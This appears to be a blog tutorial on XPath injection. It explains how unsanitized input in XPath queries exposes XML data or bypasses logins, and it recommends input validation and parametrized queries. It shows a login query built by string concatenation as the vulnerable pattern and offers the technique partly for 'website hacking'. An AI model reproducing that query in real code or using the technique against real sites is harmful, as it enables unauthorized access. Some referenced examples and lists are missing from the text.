You can use this trick for website hacking and also for security purposes. in this i am explaining XPath Injection. How The XPath Injection Works. lets Start :-
How XPath Injection Works :- >>
Working Of XPath Injection
Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).
Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn’t mess up the XPath query and return the wrong data.
XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses.
Because there is no level access control it’s possible to get the entire document. We won’t encounter any limitations as we may know from SQL injection attacks.
In a typical Web Application architecture, all data is stored on a Database server. This server can be storing data in various formats like an RDBMS database, LDAP or XML. Based on the user input, the application queries the server and accesses the information. Attackers manage to extract more information than allowed by manipulating the query with specially crafted inputs. Here, we’ll be discussing XPATH Injection techniques to extract data from XML databases. Before we go deeper into understanding XPATH injection lets take a brief look at what XML is and how an XPath query is formed.
What is xPath Injection?
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. It can be used directly by an application to query an XML document, as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document.
In XPath injection, we try to inject data into an application so that it executes user-controlled XPath queries. When successfully injected, this vulnerability may allow an hackers to bypass complete authentication systems or access information without proper authorization.
XML and XPATH
XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data . An XML document is similar to anRDBMS Database except for the way data is stored in them. In case of a DB, data is stored in a table in rows and columns whereas in XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. XPath contains a library of 100 built-in functions like Boolean values, date and time comparison, string values etc.
Lets us take an example of an XML document called users.xml and see how an XPath function can be used to retrieve information:-
The function selectNodes takes as parameter the path-expression which will extract the value in the cardno node under the savings node from the users.xml document. The path expression for the cardno in this case is
/users/savings/cardno
The result of the above query will be—
568100123412
When an application has to retrieve some information from the XML based on user input, it fires an XPath query which gets executed at the server.
____________________________________________________________________________________
Prevention
XPATH Injection can be prevented in the same way as SQL injection. Some of the preventive measures are -
Input Validation: is one of the best measures to defend applications from XPATH injection attacks. The developer has to ensure that the application does not take any malicious input. It is very difficult to decide what can constitute as malicious input. However, there are some best practices that a developer can follow. They are as follows-
Parametrized Queries: Another method to prevent XPATH injection is by forming Parametrized queries. We have seen that XPath queries are formed as expressions and these get executed dynamically at run time. In Parametrized queries, the queries are precompiled and instead of passing user input as expressions, parameters are passed.
If we pass parameters to the following query -
"//users[LoginID/text()=' " + txtLoginID.Text + " ' and passwd/text()=' "+ txtPasswd.Text +" ']"
the query will look like this-
"//users[LoginID/text()= $LoginID and passwd/text()= $password]"
The input is not used to form the query, instead, the query looks for the value in the XML document and fails. This prevents injection attacks.
Would love to here from you...